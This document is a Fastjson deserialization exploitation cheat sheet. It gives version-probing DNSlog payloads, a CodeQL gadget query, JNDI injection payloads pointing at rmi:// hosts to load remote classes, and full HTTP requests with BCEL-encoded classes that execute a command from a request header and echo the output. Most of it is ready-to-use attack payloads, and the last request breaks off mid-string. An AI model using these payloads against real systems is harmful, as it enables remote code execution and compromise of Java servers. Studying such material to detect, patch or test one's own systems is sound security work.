Fastjson Tricks and Techniques Collection
Some details for newer versions still need to be updated. Some of the techniques and payloads in this project were pasted in directly from notes I jotted down earlier; for many of them I can no longer find the original source, so no source is cited. I hope the masters will forgive me.
After working through this you should be able to answer the following questions.
- The difference between parse and parseObject
- What the main kinds of exploit (exp) are
- How to exploit when the target has no outbound network access
- Why TemplatesImpl is of limited practical use
- Why BCEL fails on newer JDK versions
- The principle behind the 1.2.48 universal exploit
- How to get around the limitation that parse cannot call all getter methods
- The principle behind the 1.2.68 bypass
Used to probe the target's version so that the right payload can be chosen. It can also be used to tell Fastjson apart from Jackson.
To probe the Fastjson version you can also send malformed JSON; if the target does not handle the exception, the error may report the detailed version.
The main approach is to judge by which classes have been added to the blacklist in which version.
Principle: the key point is that MiscCodec does a `new URL` while handling the value, and the subsequent map#put then triggers computation of the key's hash. This is easy to understand if you have studied the URLDNS chain.
fastjson >1.2.43
{"@type":"java.net.URL","val":"http://dnslog"}
{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}

fastjson >1.2.48
{"@type":"java.net.InetAddress","val":"dnslog"}

fastjson >1.2.68
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}
Set[{"@type":"java.net.URL","val":"http://dnslog"}]
Set[{"@type":"java.net.URL","val":"http://dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{{"@type":"java.net.URL","val":"http://dnslog"}:0

Precise probing: https://github.com/pen4uin/awesome-java-security/tree/main/alibaba%20fastjson
[{"@type":"java.net.CookiePolicy"},{"@type":"java.net.Inet4Address","val":"ydk3cz.dnslog.cn"}]
https://xz.aliyun.com/t/7482
https://xz.aliyun.com/t/7789#toc-4
Gadget hunting is mainly done with CodeQL.
/** @kind path-problem */
import java
import semmle.code.java.dataflow.FlowSources
import semmle.code.java.dataflow.TaintTracking2
import DataFlow2::PathGraph

// Any lookup(...) method declared on javax.naming.Context or one of its subtypes
class JNDIMethod extends Method {
  JNDIMethod() {
    this.getDeclaringType().getAnAncestor().hasQualifiedName("javax.naming", "Context") and
    this.hasName("lookup")
  }
}

class MyTaintTrackingConfiguration extends TaintTracking2::Configuration {
  MyTaintTrackingConfiguration() { this = "MyTaintTrackingConfiguration" }

  // Sources: any field read (fields are what fastjson setters populate)
  override predicate isSource(DataFlow::Node source) {
    exists(FieldAccess fac | source.asExpr() = fac)
  }

  // Sinks: the first argument of a JNDI lookup
  override predicate isSink(DataFlow::Node sink) {
    exists(MethodAccess call |
      call.getMethod() instanceof JNDIMethod and
      sink.asExpr() = call.getArgument(0)
    )
  }
}

from MyTaintTrackingConfiguration config, DataFlow2::PathNode source, DataFlow2::PathNode sink
where config.hasFlowPath(source, sink)
select source.getNode(), source, sink, sink.getNode()
Besides the Fastjson version, you also have to consider the JDK version, the middleware version and the versions of third-party dependencies.
JDK version limits on JNDI injection: RMI-based exploitation requires JDK <= 6u141, 7u131, 8u121; LDAP-based exploitation requires JDK <= 6u211, 7u201, 8u191. (Bypasses also exist for higher versions.)
For bypasses on higher versions, https://github.com/veracode-research/rogue-jndi can be used.
- jndi
- JdbcRowSetImpl
- C3p0#JndiRefForwardingDataSource
- JndiDataSourceFactory
- bcel
- tomcat#dbcp
- ibatis
- TemplatesImpl
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/badClassName", "autoCommit":true}
If JdbcRowSetImpl does not work, these can be tried:
{"@type":"com.mchange.v2.c3p0.JndiRefForwardingDataSource","jndiName":"rmi://127.0.0.1:1099/badClassName", "loginTimeout":0}
{"@type":"org.apache.shiro.jndi.JndiObjectFactory", "resourceName":"rmi://127.0.0.1:9050/exploit"}
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":"rmi://127.0.0.1:9050/exploit"}
Usable when the target has no outbound network access. Note that the BCEL classes were removed from Java 8u251 onwards.
Tomcat 7
org.apache.tomcat.dbcp.dbcp.BasicDataSource
Tomcat 8 and later
org.apache.tomcat.dbcp.dbcp2.BasicDataSource
PoC
{
{
"x":{
"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
"driverClassLoader": {
"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"
},
"driverClassName": "$$BCEL$$$l$8b$I$A$..."
}
}: "x"
}
exp
Command execution with the output echoed back in the response.
POST /json HTTP/1.1 Host: 127.0.0.1:9092 Content-Type: application/json cmd: whoami Content-Length: 3327 { { "@type": "com.alibaba.fastjson.JSONObject", "x":{ "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": { "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "driverClassName": "$$BCEL$$$l8ドルb$I$A$A$A$A$A$A$A8ドルdV$cb5ドルb$TW$U$ff5ドルdH27$c3$m$g40ドル$Z$d1$wX5$a0$q7ドルd$d8V81ドルZi$c4b$F$b4F$a5$f8j$t$c385ドル$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea7ドルfP7ドルbnf$C89ドル$d0$afeq$ee$bd$e7$fe$ce$ebw$ce9ドルd$f0$cb$df3ドルf3ドルe$Ap$I$df$aaHbX$c5$IF$a5x9ドルe$e3$a88ドルa$Xp8ドルccL$c18ドルb$w$U$e4$U$iW18ドルe$T$i$_qLp9ドルc$e4x99ドル$e394ドル$bc9ドルb$e498ドル$e298ドルVpZ$o$cep$bc$c2qVE$k$e7Tt$e23ドルc$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f19ドルa$U$af$ab0PP$b1$h$s$c79ドルc5ドルc85ドル$U$f3$i$L$iE$F96ドル82ドルE86ドル$c4$a8$e5X$c1Q86ドル$d6$f4$c0$F86ドルX$ce9ドルd$T$M$j93ドル96ドル$p$a6$x$a582ドル$f0$ce$Z$F9ドルb47ドルc$d4$b4$pd7ドルb3ドルe0$cc$a5$v$a35ドルc$bb$a2j$U$yQ$z94ドル$ac$C9ドルb$fc2$a8y$b7$e299ドル$e284ドル$r$z3ドルb$f2e$cfr$W$c6$cd$a29ドルbY496ドル$N$N$H1$a4$a0$a4$c181ドル$ab$a18ドルck$M$a3$ae$b790ドル$f1k$b8y$cf$u89ドル$eb$ae$b794ドル$b9$$$K$Z$d3u$C$b1$Sd3ドルcq$ad$o$fc$ms65ドルcs$a1z$c2$b5$e784ドル$a7$c0$d3$e0$p60ドル$e8Z$QA84ドル$Y$L$C$cf$wT$C$e1S$G2l$d669ドルc85ドルl$ce67ドルc_C$F$cb$M9ドルb$d7$d4$a7$L8ドルb$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e693ドル$X$de$b2$bda$d0$b6Z$$7ドルe$d9u7ドルc$oA5ドルd$cb8ドルca$a7$M$bc92ドル$f1C$db5$lup92ドル$c039ドルe$V$I$aa$eb86ドル$ccto$b3A1$I$ca99ドル$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY88ドル867ドル$f0$s$f5$d9$y$cd1$u$ae9ドルfq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D86ドル96ドル$acI$b0l$c1r$b27ドルe91ドル8ドルeC$a686ドル$P$f1$R$e9$q$z81ドル$ed0l$a985ドル$a8$E96ドル9ドルd$cd9ドルb86ドル$e3$c8V7ドルc$ac$e1$T7ドルc$aa$e137ドルc$ae$e0$a686ドル$_$f0$a5l$f8W$e4$e1$f298ドル86ドル$af$f18ドルd86ドル5ドルb2T7ドルc$de$aeH$c7q$d3ve$d19ドルdk$f98ドルe$af98ドル$a2$iX$$85ドル$e85$ddRv$de$f083ドルE$dfu$b2$cb$V8ドルa$b43ドルaM$M3ドルdk69ドルe98ドル$b7$a985ドル$d9$v$R$U5ドルd$w$b0$f3$d2$e4$a3$E8ドルc491ドルr$ae$e8$RS4$cdf$c5$f384ドル$T$d4$cf5ドルd$e981ドル$c9GQd$d9M$d4FSW9ドルb$a1I
7$a4Yo827ドル5ドルcI9ドルb$N$_$a8M6mj$gjmz7ドルd9ドルe$eb3ドルc8ドルe84ドル$ad$ad$d7vl$D9ドルbK$ebl$g$bd4$b3C$ee$S96ドル$b3$ec$$$R$edG$g7ドルd85ドル$cf$a0$c9W$a4$gX$af$a2$feSN$c785ドルi$h9ドルe98ドル$ab$e7$d6$ee8ドルb60ドル$cc485ドル$ef5ドルb$b5$efF$y7ドルdQ7ドルeW$g$a7$f186ドル$l88ドルR$f840ドル$cexnYx$c1$N86ドル7ドルd$ff$c1$c3j$L$db$C$f77ドルc99ドル8ドルcr86ドル9ドルc9ドルa$e6n$ad82ドル$b87ドルc$a786ドル$e5$Q$c1$bd8ドルd8ドルesE$c3$cb$cb$d7$e298ドルbd$e0$o$Be5ドルb$c3Nt$ae$ef$e4H7ドルd$c6k$aa$b3$V$t$b0J$f5$c75ドルc3ドルft799ドルEj28ドルc89ドル$VA$_$u9ドルd$de60ドル$Q$h$z88ドル$C$c9Vs$a8H$c9$b089ドルB9ドルdt$ca95ドル80ドル$y85ドルA$acm$ab87ドル$b3$dcl$c3$F99ドル$f7$a47$bc90ドル$eck$V_$i$X$b6U92ドル$df$U86ドル$fd$ff$ceu$e3c96ドルE84$ef$e8$c3$B$fa7ドルd91ドル7ドルf$z60ドル$f2$ebM2C$a79ドルd$b42Z$e383ドルw$c1$ee$d086ドル$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa88ドル9ドルf$gL$rZ$efC$a982ドルO$k60ドル$b4KV$a1NE80ドル$b6$Q$a0$d5$B83ドル$a9$f6h3ドルb7ドルd$e060ドル84ドル$j8ドルe$N$adn$e391ドル$dd$s$b2Ku84ドル$d0$cd$c389ドルH$bbEjS1$d2$ce$b6$a63ドルa$f3$f2J$d1$VJ$a2KO84ドルR8ドルf$d53ドルdq5ドルd$d1$e3$EM$S$b49ドルb$a0$ea$cf$e8$iN$s$ee93ドルTS5ドルb$efa5ドルb$V3ドルd$v$bd8ドルa$ed$df$p$a5$ab$S$a3$ab$b1To$fe63ドルa$e4qG$ed$b893ドルd5ドルcO$e6u5ドルe$c5c$a95ドルd8ドルd91ドルu$k3ドルa$ff$J$bbg$ef$a1OW$ab$e8$afb$cf5ドルd3ドルc9ドルe$da5ドルb$c5$be$w$f6$cb$a03$a1e3ドルa$aaD$e7Qz91ドル7ドルe60ドル9ドルd$fe6b$a7$eeH$e6$d9$y$bb8ドルcAj95ドル$ec85ドル83ドル5ドルe92ドルIhP$b18ドルd3ドルa$d0G$bb$n$b4$e306$n87ドル$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC77ドルe$c0VP$a9x80ドル$k$fc$K$j$bfa3ドルb7ドルe$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a588ドル7ドルb$d8$V$ec$c793ドル$U$edY$c4$k$S$b8M$c1S$K9ドルeVp$a8$$$c3M$b87ドルfF$n$i$da$k$c293ドルs$a3$e0993ドルd87ドルk$pv$e4$l3ドルeQL40ドルE$J$A$A" } }: "x" }
POST /json HTTP/1.1 Host: 127.0.0.1:9092 Content-Type: application/json cmd: ver && echo fastjson Content-Length: 3327 { { "@type": "com.alibaba.fastjson.JSONObject", "x":{ "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": { "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "driverClassName": "$$BCEL$$$l8ドルb$I$A$A$A$A$A$A$A95ドルW$Jx$Ug$Z7ドルe$t$bb9ドルb99ドルL$s90ドル$y$y$n$Jm9K$Sr$ARZ$S$K84ドル40ドル$m92ドル84ドル98ドル$NP$O95ドル$c9dH$W63ドルbav96ドル40ドル$ab$b6JZ5ドルb$LZ$Lj9$d4$Kj3ドルc$f0$m$d1$r82ドルE$bc82ドル$d6$fb3ドルe$aax$l$f5$be8ドルb8ドルfJ7ドルd$ff99ドル$Nn$c896ドル3ドルc3ドルe$cf$ce7ドルf7ドルe$ffw$be$df$f7$ff$fb$f4$b5$f3$X$B$y$c1U$V$c5x$m$H$ab$f1j$d1$bcF$c6A$V7ドルeo$a5_4$P$wxH$c5k$f1$b098ドル3ドルc$a2$e0u$a27ドルfT$c6$n$Vy8$ac$e2$f5x83ドル$ca95ドル$c7$c4$a978ドルa$e6q13ドルd$o$d8$kUQ887ドル$vx$b38ドルc$b7$c8xB$cc8ドルe$c98$ae$a0I$c5$J9ドルc$U8ドルc$de$aa$a0C$c6$dbd$bc5ドルd$c5L$i96ドル$f1$a48ドルa$d9$a27ドルf87ドル8ドルa$b98$ac$e094ドル8ドルa$d3x$a78ドルa$e9x97ドル82ドルw8ドルb7ドルe40ドル$c17ドルb$U$bcW$c1$fbd$bc_$c6$Z$V$l$c0$HE$f3$n$V$l$c6Y$V$d5$YT0$q$fa8ドルf88ドル$e6$a3$w$aa90ドル$U$cd9$d1$M$L53ドルe$a6$e23ドルc$$88ドル$e6$e3b$fa94ドルP$f9$a28ドルcO88ドル$c9$ra$d3$te7ドルcJ82ドル$d4$zaJ$d3n7ドルd9ドルf5ドルe9ドルdp$o$d1$ea$f5z$bc3ドルbl3ドルa$b5$Sr$c291ドル$ae98ドル$ee$qlS$c2$fc$f1$U$cb$bd$a5$a8$k$eb$aa$de$d8$b1$db49ドルc$da$V3ドルc95ドルeD$r$U$a6$ed$d5G$f5x$bc$c9$d23ドルbM9ドルb$db$be$ee$b8$z$a1$e0$c67ドルdo$a797ドル$ad$d1$d3$v$n98ドル$b6$lv$ecH$ac8ドルb$E92ドル3ドルdv$p$r94ドル$h3ドルc97ドル$bd3ドルc$S8ドルb8$x$c8$a0$b4l$b3$E7ドルf$bd$d5I$b5$t7EbfK$a2$a7$c3$b4$db$f58ドルe$a8$v$YX86ドル$k$dd$ac$db$R1O$zJ$fcf$df$a8R8ドルb$e54X89ドルX$e7$da$fd86ドル$d9$ebD$ac$Y$r$f99ドルd$eeH5ドルc$c29ドルc$a6x$a2$a7$c7$b4$e3$a6Qm$g$ddVu$bd$Vsl$x$g5$ed$ea$baht$z97ドルH9ドルc$XvtcO$b3$de$ebJ$a1$b3$J$u$ca8ドルaH$I95ドル8ドルe7$a3l$hu$b73ドルavK$c8o69ドルdn$ab$b3U$b7$f5$k$d3$a1$U$J$d32$ih$Uv$e6v99ドルN9ドルb$Z$ef$b5bq$daP9ドルcFe9ドルb$bb$a2$q$ab$f698ドルQ9ドルdP$daf$baM$e9867ドル$d284ドル$$3ドルdZg$Yf3ドルc9ドルeNT99ドル81ドルscl$l7ドルd$v$I$dau9ドルbz$a4$d3$cfJ$a3o$b1$c2$J$a3$db$d3$p9ドルd$s$d7$e8$d6$e9B$a785ドルf$S7$bd7ドルd$d7u8ドルcX$d5$ad$M$ba$b3$c58ドルe8$$j$qKB$a0
93ドル$t$JV$a9$d1K$s$e6$RS889ドル$c7$a5$G7ドルe7ドルb$e9$f1N$d388ドル$ea$b6$d9$d9$Q1$a384ドルQQ$G$ad$dd$z$b2$M$c4$j$ddvx$$$e6f$ee$a7e7ドルc86ドルy$xAYnDSPR$c3V$c26$cc86ドル88ドル$c088ドル96ドル$Kl95ドル60ドル$a9$e1$rh$d3$d082ドル8ドルd$gZ$b191ドル80ドル$k97ドル$k$g$ea$b1F$c33ドルa$ac970ドルO$ec$ee$af8ドルa9ドルb$f6$be$a8$e9Tu3ドルbNo$d5z6ao$a1$cd$dc9ドルb0$e38ドルe8ドルc$cfj$Y$c1e$N8ドルdx$b184ドル$db$t3ドルa$e4E5ドルd$c3$GA3ドルds$o$f4j$f8$i$dad7ドルc5ドルe$c3$d3$f882ドル868ドルh$c4$X$f12$N_$S$cdKE$f3e7ドルcE$c3W$f15$a63ドルe$c3$b9$de$U$v$cb$i$ba813ドル$Bzcrj$f83ドルa$be1f$dd$c3$a88ドルcoj$f8$W$be$ad$a1$J$cd$y3$Z$A8F$f3$cc$f093ドル$b0$e0$ff$A9ドルf84ドル$db$s80ドル9ドルe$E$d98ドルaW$c588ドル3ドルa$Z$df$d1$f05ドルd7ドルcO$c3$f7$f1$MkH_$q$d6i$f5$J$bf$fc80ドル$c9$b8n$f5$G$c2dS7ドルbC$e55ドルd9ドルeG3ドルc88ドルe$da1$W$a4c$m$Q6$f4X$cc$b4e$fcP$c3$V$fcH$c38ドルf$f1$T$Z3ドルf$d5$f03$fc5ドルc40ドル$e7$X84ドル$fb8ドルe3ドルa$N$bf$c4$af4$fc$g$cfhx$W$bf$d1$f05ドルb81ドル$a9$df89ドル$e6$f7$f8$D$f1$a8$e18ドルf$f893ドル86ドル3ドルf$e3$_$g$fe8ドルa$bf$J$a8$e994ドル$be7ドルd7ドルc$z$d0$f0w$R$bb7ドルf$e09$a6$de84ドル$b589ドル85ドルb$fbM2$a3$f0$F$b698ドル9ドルe$Z$ab3ドルa9ドルd$T$e5$m$F8ドルey$a5$e3kwY86ドルr3ドルf$b9W8$cf$z91ドル$ed$b6n98ドルc$e0$d3$dem$T7ドルdLh$pa$dbf$cc$Z9ドルdO$zMg$e5$ad92ドル97ドルb$d0F3ドルd$S$a3x9ドルf$deI3ドルa85ドル$d1J$e93$a5493ドル$f4$fcH$bc$$$k$X$f7$hKs83ドルm$f5$I$de$e3$e8DM$W81ドル$f7$A$qaU$G$db$b68ドルf3ドルfu$b3$w3ドルc$fd85ドル$f6$I$bf$I1$bd87ドル8ドルeX96ドル$a1$dag$IzY$a6$bb03ドルd7$P$c4$j$b3$c7$bb$pZm$ab$d7$b49ドルd$D$y$x$T$c4$e7$fau9ドルb$ebXMV9ドルfi$d7$eb$e2j$Z$eb$f9$ebD$rc9ドルc$c6z$k$W$b5$yf98ドル$ae$ef$K$fe$b7$d796ドル889ドル$RQ$e7Uqc8ドルdNBc$b8$a696ドル$c53ドルdk$ee7$N$be3ドルa$s$d095ドルV89ドルJQ3ドルbFRjQ$c2$qJj8ドルc$f5$s$I2$e284ドル8ドルe$u$i95ドル$c6$d4M$db$e0$f1$f2$d28ドルc$h$Z$a4$f3$ce$d5$Sqs8ドルd$Z8ドルd$f4xy7ドルf$T$r$d38ドルb81ドル$b0$wf$ee$e78ドルd$p$bb$c88ドルf$c6nx$H$a4I$I$ec8ドルa$s$e2$bc$ea$CF$d4$S$ce$_$a0$rk$d2$af6Z7$a3$b4$ecfI9ドルc$c78ドルb$d5$ab$a3$R$f789ドル$e3$_$dd$s8$fb$c8$e9$G$M$dc$MM2$d3$c4$b6$f5$D$ee$b38ドルa$B$cd$e3$f1p82ドルH2$bc$e4$K89ドル3ドルcc$ee$d1$ae1$F$a1h7ドルc$d2$a55ドルe80ドル98ドル$c5gh19ドルf$e52$UqCB$c2Z$ce$b2$d0$c09$_K8ドルe$Vq$ff$b9$fd86ドルT$cf$db$c3$edy$df$ba7ドルd$ab$db$Hx96ドル$d70$db0
gI$f2$c8b$bf$bc$fc$i$qi$IY$fc7ドルc$X$e0$dfz$O81ドル$nd$PB$O$wI$e4$MA$V$c35ドルcw$a8$N40ドルiZ90ドル$c4$a4aL$f6$N$p$ff$yyMC$F$l$d4y$f0$a19ドルd$dc$aa90ドル$cbv29ドルf$fc$F94ドル$h84ドル86ドル$v$a4$I$d1$KAWD$caB$y$e483ドル7ドルd$JJP8ドルb$Z$d8D$eai$d4c$nOl$c6$W$f2$a3F$b8$H5ドルb$d9o$e397ドル8ドルf$ac$e7yH92ドル$b15ドルd43ドルb$fcP$c5$dd$cb$Ta97ドル$o$cb3ドルdQ5ドルc3ドルe82ドル$bcAd97ドル$tQp$M$B$ff$Zo$i$dc$e23ドルb$c35ドルdO$b3$m$r$A$b7a$S$ffS$e4c$Ou98ドル$ebJ$d73ドルc$Ox$b9$eb$p$n$d38ドルf$acI$Sv$K8ドルfI5ドルc$GE$f2$o$f1Df3ドルd82ドルl$c1H$aa$y$c9_r$g93ドル$H915ドル$o3ドルc$e4$h81ドル$ffl$f90$a6$i97ドルB5ドルc$bb8ドルc87ドル$G$a1R85ドル$a9I84ドル8ドルe$e1409ドル$fd$cb85ドル$e04$ffS$u$dc$ea$LN$P$tQT$ceI1$t$r9ドルc$cc$b884ドル$e9C$b8e$Q$b75ドルc86ドル$w$a21802ドル$f2$n83ドル$e0$ad3ドルe9ドルe$nys$F$X8$$$s5C$c5P47ドルb84ドル8ドルb9ドルb$x92ドル985ドル80ドルr$d1$cf$Z$c0l$d1$cf$h401ドル$d5$ba8ドルc$a983ドル$d0$ae$x$oS$R9ドルf$abs$b7$absG$f0$f6a$ccO$a24X96ドルD$f91$u$c1$F$D$I$E$x9ドルay$uX99ドル$SL$ca94ドル$d8K$a8j$a9$bc80ドル$ea$ad$c3XHU93ドルX94ドル$c4$e28ドルasxQpI$Sw$q$b1489ドル3ドルb$x93ドル$b88ドルb$df$b2$B$f89ドルb$cf96ドル97ドル$f8w$ba8$J$a0$D$P$e0$m$fd$bf$I$P$e3Q$c640ドル$f4G$f8$bfN$f4$t$Y8ドルb$Ri$a6487ドル$fb5ドルe$b4$k$e7$K09ドルfQ$x$r82ドル$ca$Z9ドルf$F$a8$q82ドル$W$R$M9ドルb88ドル96ドル$ed$iu$e0$O$d8XJ$be$b5$e47ドルc$t$fa$b18ドルc$bc$ea$c9$fdn$i$c2$K3ドルc$c6$f1$R$ac$c4Q$ac$c2$T$i9ドルf40ドル$jN29ドルb9ドルe$e4$f84$b3$u$c9$i3ドルa$cf8ドルc$Za$be5ドルca$c65ドルcE8ドルb49ドルd8ドルf$d3$Zh95ドルf$oLm$da$a4$b9h97ドル$e6a8ドルbTAD$K$b4$ec40ドル$OeN$a2l83ドル80ドル$e8wQ$db$c9$d1$nwdrt$d4$j$ed$e2$e8$a43ドルb$ea$e2$e8$K$a5vSB$We94ドル$o82ドル$dd$b492ドル$Q$c2$k$Xsb$UE$Pq$u$d0W8ドルa$fc$m$fe85ドル96ドル9ドルd2b$fe$d52$acu2z$f9$ed95ドル$a7$cd$ac93ドルa3ドルf87ドル$b5$dc$Ba$u$Q9ドルa93ドルE$s$e0q81ドル$d2$f8$uJ$a57ドルb$d8k5ドルc$eb$X91ドル$Xp$a8i$a9$bc$b8$d4$ef5ドルb$g$I$FB$feS0$xC81ドル$c55$d9E$d9$fe$qj$a5$g$b9H$a4$cbr$f6$b28ドルb94ドル$bb8ドルfC$x92ドルK86ドル$b1b$A$d5E$f2$r$ac$e4$afF$vR$$$$$cd$f1$zUCj$u$e7$U$a6$V$v$nuqMnQ$ae$m$ecW$a581ドル$e79ドルf$rxj94ドル$fe$A87ドル$c7$vt$d5$d6$e6$cb$cf3ドルf$u8ドルa$c47ドルcXt$dbhpW3$B85ドル$x$DL$e45ドルb99ドルasi$ca7ドルc$ba$b49ドルa$ae$ac$a1$T$eb$e9483ドル$O8ドルb$b0$b7h$abM$e78$a4$bd$X7ドルbq$lg$H9$T$c1XA$t$Y$fc$i$ba197ドル$
i9ドルa5ドルd87ドル$ca$e4$b9$Z$J$ec$e3$O3ドルd80ドル3ドルe$cf$c9$iyN$O$e07ドルe$ecg$d8$b35ドルcwWA$f97$C2$O5ドルcC$ae8ドルc7ドルb$r$e93ドルfX$q$e33ドルe$Z$af$b886ドル$C$Z$x$r$e9$w8ドルa$Y86ドル$d83ドルf$c1Q60ドル$d4$e97ドルd$v$a7$xx$e5$f58ドルa3ドルa$db$ad$q$M$E$abc$SuC90ドル$cf8ドルa$e0$ba$sg$bb7ドルb$K$dbW$b9$d5$fb$fe$ff$Ctz$ebem$R$A$A" } }: "x" }
POST /json HTTP/1.1 Host: 127.0.0.1:9092 Content-Type: application/json cmd: whoami Content-Length: 3647 { "xx": { "@type" : "java.lang.Class", "val" : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource" }, "x" : { "name": { "@type" : "java.lang.Class", "val" : "com.sun.org.apache.bcel.internal.util.ClassLoader" }, { "@type":"com.alibaba.fastjson.JSONObject", "c": { "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": { "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader" }, "driverClassName":"$$BCEL$$$l8ドルb$I$A$A$A$A$A$A$A8ドルdV$cb5ドルb$TW$U$ff5ドルdH27$c3$m$g40ドル$Z$d1$wX5$a0$q7ドルd$d8V81ドルZi$c4b$F$b4F$a5$f8j$t$c385ドル$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea7ドルfP7ドルbnf$C89ドル$d0$afeq$ee$bd$e7$fe$ce$ebw$ce9ドルd$f0$cb$df3ドルf3ドルe$Ap$I$df$aaHbX$c5$IF$a5x9ドルe$e3$a88ドルa$Xp8ドルccL$c18ドルb$w$U$e4$U$iW18ドルe$T$i$_qLp9ドルc$e4x99ドル$e394ドル$bc9ドルb$e498ドル$e298ドルVpZ$o$cep$bc$c2qVE$k$e7Tt$e23ドルc$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f19ドルa$U$af$ab0PP$b1$h$s$c79ドルc5ドルc85ドル$U$f3$i$L$iE$F96ドル82ドルE86ドル$c4$a8$e5X$c1Q86ドル$d6$f4$c0$F86ドルX$ce9ドルd$T$M$j93ドル96ドル$p$a6$x$a582ドル$f0$ce$Z$F9ドルb47ドルc$d4$b4$pd7ドルb3ドルe0$cc$a5$v$a35ドルc$bb$a2j$U$yQ$z94ドル$ac$C9ドルb$fc2$a8y$b7$e299ドル$e284ドル$r$z3ドルb$f2e$cfr$W$c6$cd$a29ドルbY496ドル$N$N$H1$a4$a0$a4$c181ドル$ab$a18ドルck$M$a3$ae$b790ドル$f1k$b8y$cf$u89ドル$eb$ae$b794ドル$b9$$$K$Z$d3u$C$b1$Sd3ドルcq$ad$o$fc$ms65ドルcs$a1z$c2$b5$e784ドル$a7$c0$d3$e0$p60ドル$e8Z$QA84ドル$Y$L$C$cf$wT$C$e1S$G2l$d669ドルc85ドルl$ce67ドルc_C$F$cb$M9ドルb$d7$d4$a7$L8ドルb$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e693ドル$X$de$b2$bda$d0$b6Z$$7ドルe$d9u7ドルc$oA5ドルd$cb8ドルca$a7$M$bc92ドル$f1C$db5$lup92ドル$c039ドルe$V$I$aa$eb86ドル$ccto$b3A1$I$ca99ドル$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY88ドル867ドル$f0$s$f5$d9$y$cd1$u$ae9ドルfq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D86ドル96ドル$acI$b0l$c1r$b27ドルe91ドル8ドルeC$a686ドル$P$f1$R$e9$q$z81ドル$ed0l$a985ドル$a8$E96ドル9ドルd$cd9ドルb86ドル$e3$c8V7ドルc$ac$e1$T7ドルc$aa$e137ドルc$ae$e0$a686ドル$_$f0$a5l$f8W$e4$e1$f298ドル86ドル$af$f18ドルd86ドル5ドルb2T7ドルc$de$aeH$c7q$d3ve$d19ドルdk$
f98ドルe$af98ドル$a2$iX$$85ドル$e85$ddRv$de$f083ドルE$dfu$b2$cb$V8ドルa$b43ドルaM$M3ドルdk69ドルe98ドル$b7$a985ドル$d9$v$R$U5ドルd$w$b0$f3$d2$e4$a3$E8ドルc491ドルr$ae$e8$RS4$cdf$c5$f384ドル$T$d4$cf5ドルd$e981ドル$c9GQd$d9M$d4FSW9ドルb$a1I7$a4Yo827ドル5ドルcI9ドルb$N$_$a8M6mj$gjmz7ドルd9ドルe$eb3ドルc8ドルe84ドル$ad$ad$d7vl$D9ドルbK$ebl$g$bd4$b3C$ee$S96ドル$b3$ec$$$R$edG$g7ドルd85ドル$cf$a0$c9W$a4$gX$af$a2$feSN$c785ドルi$h9ドルe98ドル$ab$e7$d6$ee8ドルb60ドル$cc485ドル$ef5ドルb$b5$efF$y7ドルdQ7ドルeW$g$a7$f186ドル$l88ドルR$f840ドル$cexnYx$c1$N86ドル7ドルd$ff$c1$c3j$L$db$C$f77ドルc99ドル8ドルcr86ドル9ドルc9ドルa$e6n$ad82ドル$b87ドルc$a786ドル$e5$Q$c1$bd8ドルd8ドルesE$c3$cb$cb$d7$e298ドルbd$e0$o$Be5ドルb$c3Nt$ae$ef$e4H7ドルd$c6k$aa$b3$V$t$b0J$f5$c75ドルc3ドルft799ドルEj28ドルc89ドル$VA$_$u9ドルd$de60ドル$Q$h$z88ドル$C$c9Vs$a8H$c9$b089ドルB9ドルdt$ca95ドル80ドル$y85ドルA$acm$ab87ドル$b3$dcl$c3$F99ドル$f7$a47$bc90ドル$eck$V_$i$X$b6U92ドル$df$U86ドル$fd$ff$ceu$e3c96ドルE84$ef$e8$c3$B$fa7ドルd91ドル7ドルf$z60ドル$f2$ebM2C$a79ドルd$b42Z$e383ドルw$c1$ee$d086ドル$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa88ドル9ドルf$gL$rZ$efC$a982ドルO$k60ドル$b4KV$a1NE80ドル$b6$Q$a0$d5$B83ドル$a9$f6h3ドルb7ドルd$e060ドル84ドル$j8ドルe$N$adn$e391ドル$dd$s$b2Ku84ドル$d0$cd$c389ドルH$bbEjS1$d2$ce$b6$a63ドルa$f3$f2J$d1$VJ$a2KO84ドルR8ドルf$d53ドルdq5ドルd$d1$e3$EM$S$b49ドルb$a0$ea$cf$e8$iN$s$ee93ドルTS5ドルb$efa5ドルb$V3ドルd$v$bd8ドルa$ed$df$p$a5$ab$S$a3$ab$b1To$fe63ドルa$e4qG$ed$b893ドル